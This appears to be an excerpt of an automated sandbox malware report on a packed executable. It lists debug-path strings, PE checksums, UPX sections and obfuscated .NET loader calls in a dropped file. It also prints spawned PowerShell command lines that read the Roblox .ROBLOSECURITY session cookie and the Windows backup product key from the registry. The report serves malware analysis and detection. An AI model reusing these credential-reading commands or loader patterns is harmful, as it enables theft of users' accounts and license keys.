Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sB2ClgrGng.exe, 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000033.00000002.2006716977.000001F23D140000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFAD49000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2201961884.00007FFE148D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdb source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000054.00000002.2056884816.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000054.00000000.2033915659.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201662595.00007FFE148B1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdbhP source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200043623.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200583861.00007FFE13201000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: sB2ClgrGng.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200350794.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201280162.00007FFE1463E000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200882637.00007FFE13381000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199391606.00007FFE0EC11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2199060511.00007FFE0EBD1000.00000040.00000001.01000000.0000000E.sdmp

Source: sB2ClgrGng.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sB2ClgrGng.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sB2ClgrGng.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sB2ClgrGng.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sB2ClgrGng.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: word.exe.15.dr, 5whPALIRpaC.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.hRGt3t2BI5NBE16iVD7xr0HhHEFn3QhLmqZR4Rv3CfDU2gept9oxrZGjpslZB5AWnOLt,eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ._0dYpdqi5N3KcOOgU48vE2JY8RZtzj4ItqWxDBfyAkmLEw9j0PEimmBzTXFGAtQXJ3DIP,eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.D44ELgwAxdB5D1SOR6NZdYKMVQQVbA79aFtCmu4TJOe7j7mQdUyPjeDIyhCP5wL1biXB,eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.x60SHmPgLXEYCuJ809IulnRFg8UhYVP5j6KzRmQdd6Tl0rWUX7wwaGYwNohE1CGuI02R,t59oPSjC0CT.kHWaf8XGbIL()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: word.exe.15.dr, 5whPALIRpaC.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{P7kSXxWa2sD[2],t59oPSjC0CT.h3ajPDGSWAH(Convert.FromBase64String(P7kSXxWa2sD[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: word.exe.15.dr, 5whPALIRpaC.cs	.Net Code: EVNaqnJWHbq System.AppDomain.Load(byte[])
Source: word.exe.15.dr, 5whPALIRpaC.cs	.Net Code: vvKZf0kanCj System.AppDomain.Load(byte[])
Source: word.exe.15.dr, 5whPALIRpaC.cs	.Net Code: vvKZf0kanCj

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 1_2_00007FFDFAE9F160 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFAE9F160

Source: word.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x1ac48
Source: tuy1nspn.dll.55.dr	Static PE information: real checksum: 0x0 should be: 0xd675
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a726
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x57047
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x14723
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x159c9
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa80c8
Source: python312.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1c7d53
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x19efbf
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xdab2
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1676e
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x212a8
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x14ecc
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x3a250
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xfb70
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x252b5
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x16341
Source: sB2ClgrGng.exe	Static PE information: real checksum: 0x79de6b should be: 0x7a2f45

Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF855808B push r12; iretd	1_2_00007FFDF855809F
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF85582D8 push rdi; iretd	1_2_00007FFDF85582DA
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8559327 push rsp; ret	1_2_00007FFDF8559328
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555C31 push r10; ret	1_2_00007FFDF8555C33
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8558419 push r10; retf	1_2_00007FFDF8558485
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF85594B9 push rsp; retf	1_2_00007FFDF85594BA
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555D06 push r12; ret	1_2_00007FFDF8555D08
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555CE0 push r10; retf	1_2_00007FFDF8555CE2
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555CE5 push r8; ret	1_2_00007FFDF8555CEB
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555CED push rdx; ret	1_2_00007FFDF8555CF7
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8558DBF push rsp; retf	1_2_00007FFDF8558DC0
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF855763E push rbp; retf	1_2_00007FFDF8557657
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555E18 push rsp; ret	1_2_00007FFDF8555E1C
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555DF7 push r10; retf	1_2_00007FFDF8555DFA
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555EB4 push rsp; iretd	1_2_00007FFDF8555EB5
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8557689 push r12; ret	1_2_00007FFDF85576CD
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8559686 push rdx; ret	1_2_00007FFDF85596DD
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555E67 push rdi; iretd	1_2_00007FFDF8555E69
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8558F42 push rsp; iretq	1_2_00007FFDF8558F43
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555F56 push r12; ret	1_2_00007FFDF8555F73
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555F01 push r12; ret	1_2_00007FFDF8555F10
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555FB9 push r10; ret	1_2_00007FFDF8555FCC
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8557F67 push rbp; iretq	1_2_00007FFDF8557F68
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8555F7B push r8; ret	1_2_00007FFDF8555F83
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8556859 push rsi; ret	1_2_00007FFDF8556890
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDF8557FFF push r12; ret	1_2_00007FFDF855804A
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Code function: 1_2_00007FFDFF1B4021 push rcx; ret	1_2_00007FFDFF1B4022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9A7AD2A5 pushad ; iretd	13_2_00007FFD9A7AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9A8C86CB push ebx; ret	13_2_00007FFD9A8C86CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9A8C0C07 pushad ; retf	13_2_00007FFD9A8C0C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9A8C861B push ebx; ret	13_2_00007FFD9A8C862A

Source: word.exe.15.dr, eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.cs	High entropy of concatenated method names: 'xCExjsciao65c7Za8gwljxn8BEAgwn58sXylMB6POlqBAmogBa00QjIwggjGD', '_0hKl67MaaT6T71IhzPgDdL9kAnTPy2zpzO9xQB3o6fMIL1sAOCIAbJyfZqFN3', 'VGk5rdOcEQm9iY5Cxgdjscs2xZt7Jtyl9u13SCNzzmobgWGxuBcdxlpLREfKs', 'YkUnyrt9P7NbIkw5i7KxrYhdvaEYaGJXZphsd3pMHlOxvas96IYDEJ1Tz3UIn'
Source: word.exe.15.dr, wFhkyj2TAZd.cs	High entropy of concatenated method names: 'rVdbOfrygrD', '_375tVKqBCoR', 'gLfq5HYZZRJ', 'IG9VgjbAyGdfyIPek8f5', 'MACGpF6t9KVDWxop0XIE', 'jPD02mdfQmIFNRL7B9CV', 'sXL36GUfa80M8Mts6QOZ', 'Ry6pnWk6f7uHe9JpD9bS', 'aUfxz2spczDe8bQB9sNA', '_5HR4wlPpX0OZ3sU7zDug'
Source: word.exe.15.dr, M7L4lQj5iUzZKZ9rVqg2tDuhxNZPUotqCaXin9eK05hI0acUrmPQJuwvd4jwF6C3k5WSSMajVOWugEYX2fb.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'zhmWdIVKL33jLaxc1oSAwganFnUkKoDUb8RwfisY9tUq0jtcF9mQ8SE2V4oNt', 'cS4el7smZ2myIin1UTtElAT4spS8g7xLEpi7J6aCvT5QAPkCumcJ9cuRLZBy9', 'UrPCh1AFTAQtUoxwkxp70DX6B5XoeoYAXEBNiHn3DrerE3rhwvB60NVbI0e08', 'fqOskespC6CyT28tlx63XMyyCFU2ZWkem2n2XsYEQytel7TEr5EK9AK19BhbU'
Source: word.exe.15.dr, t59oPSjC0CT.cs	High entropy of concatenated method names: 'pRqyph6aET2', 'TIbIRTq3Pax', '_37C8BeO7upT', '_5OPcrI5rwuD', 'nV6ztBel0qS', 'NC4YpvcMU0W', 'hYAizJmfVjJ', 'emAHpz4bx6N', 'lpjVak4Mk3R', '_9R9LAPNH3Un'
Source: word.exe.15.dr, MGdJK5Be6LW.cs	High entropy of concatenated method names: 'hzesppwIN0M', 'nrGWG8AW4Dy', 'VPWdcoN21zd', '_0hpn9j8CdGU', 'AllYxW4JSvw', '_85Z9ieq4k9P', '_0FkK6JX7vr1', 'cbISOi6znf1', '_0ZsXLznIRgY', '_9sDVG5ycbO5'
Source: word.exe.15.dr, VpHhD0XCMxd.cs	High entropy of concatenated method names: 'uKy1GgchXFf', 'bgz0ilBnPcGYLEdGQUQ8blP4gwDyjBPwsKInkiaZx2HI7bksWdanCGtMxr4l3rR6LjFHYYAdFqYIbg', 'a9jtjUsxCZ8tpX1aSDJP5p9n5mT7z0Ev2faS3t7qQ1quzd3xhvVWRwoXkfIBLPu9Ade3tCRDzZbNFV', 'fCEUwmORJsxARbO8UgERNPYER9e6WRZxn5P69pQ1OkbmY3CDBUK55GHNNITNTvlky6ey6o94XtLk9V', 'BwRjrNIALj0CPpwcpIyYAuKvu0BQ84714PsIWnxaHcF4yajoCxhYVFFHBsmATFsVrnn7O05Zm7bkqJ'
Source: word.exe.15.dr, 560MLqhQiOg.cs	High entropy of concatenated method names: 'eCLOfkprHJ2', 'DBl9KgVqdbcywR6EjJHw7b5E6Ud2TQhFfQa1S4YxARTH1T', 'a51CzIYiXv1ZUFLqVDpAwDTS72LsJyrPYcnCG4QpjgVbzv', 'hhmY8VC7xSUi199nntYHIuJSUpDJiia1JR84rGrxGjrbFU', 'ORF1LxG67aDCJR5aXdvDc2RswUVEUTxzE0VgUu2MVbppKQ'
Source: word.exe.15.dr, 5whPALIRpaC.cs	High entropy of concatenated method names: 'XmFnMS8b4MM', 'EVNaqnJWHbq', 'oXjuipvdzV0', 'cbM6xWBpfyX', 'WqTb5sgwqFw', '_37CNih9QYiT', 'FqIOfEQmvFz', '_2DJg3FuHO0N', 'Av708JQHFI1', 'bVbxw85CiBv'
Source: word.exe.15.dr, VuKraMEajh6aEtu04ORbQHh9FmG6vfBJcHDgEeIMYzvazjSWI5uTPELxjgIj83WKzfxN.cs	High entropy of concatenated method names: 'NOvy6h6vxanZpAKXw2Wi81PogHqJxuXH7Nvuz3C08uYQjJnqskmTymWGf6TTHpB5EWz3', 'iRivWf9gFggqHKzLu6PQR5DjOp94EnDXpmAxXZxhH4lk7hoejsmCqsUsvPGO1PU0V8TH', 'jtETNZdbDAe0W6qESjcKSyxmR2UJ9JT9dtqMoa4dT6GyGQp4glmNVCoQi03JZXZFp08i', 'aO36gpMmzbbpUSVSngPqy0b7WwoPCk4MPnjoAa309lh7kg3BtC5tIkE3gA3ReKBQuOAz', 'iqWsiCX78qGVlUHvmn7yxfJZnv7dsqYz8meQsrMqLFcSFk8uyUnsQZvXMra55Q5LGnc2', 'eRqtGcPLsVAkZBHVfcDEnw1xJVZybYi1iDPO5mxzFF5VE3X6XN8V77ChYndBj', 'hJS34WIHv8HuumYgfCl3zitzkDOKUuiccZJR7WfrFOu9CIRcQZY7T1k0Egbvn', 'S3dNB6c0t4gdgfQSi4TFI6GKroNb344RAEcPZbsZCgxYNGTf5rPf4PKab40IP', 'jDUBRtQygkAKLNz4luVyxh1L6O5PS7EDqHhKAxUjdU3vynpIrSAg9z2ouXxiC', 'fSy7b686JahAq0UHw1eZvdYoQnMk9tZdTi31xqPcQDiPF4tSRpau9C4Foko6h'
Source: word.exe.15.dr, 65Nsn2AHc1YsaIbggxKProUWrDJnjbfWUl5kBscMMxWQZmk826K2xqGihehhODszqdI3.cs	High entropy of concatenated method names: 'NCPZ9YVC1iTLjmZ8mljnqlo3QvGzAVo3WAAAbGBLv41yOUktUTBg9UbPALNX14CZ1exB', 'JXwFg4ttxfGrVrTaRtBCGTbAKuI7T3ty7lX9uFrNFjYugIRvuIef5mgNDrCixcmzSru2', 'EeufEJem8JMivxiBegl0FvvhDX6FwFt78e0R6DicauWsqIyZsgWtmynjDYWcUiioSBt0', 'gmlWI8CmnGqK1zqHhJkTYe9fwJ3B2a8Podxi2Vr9gJoq03n8jnQbZURlnlPs4ZVhxlY8', 'gu0TD7v9liXZpdqt8SXbKWriY0pnVZDUo58yxJBRzSr2zhGYtkzgt4DDYHAFkTMa3wEg', 'kGDFfQnYrwEfxM3uNIKXOqCdv2woVEsLqWQs7UjTQfH9zyyaWV8oe924wtjSvfai8KFV', 'wBlLsd8u5rLO1EpWLvD8zsFOsuanD2SLnHzSb5NEp00ANHTLeU3NIZMr3mDO0K0p5Jw2', '_25FCdmpb0dBUh7RkE2F6dmh911xcBI5GZ6qptqzWy9tTdR0xBU9jiayn0CvnGYWLHTwm', 'ZPTlSMmCWIQ', 'J50USJA7QK3'

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

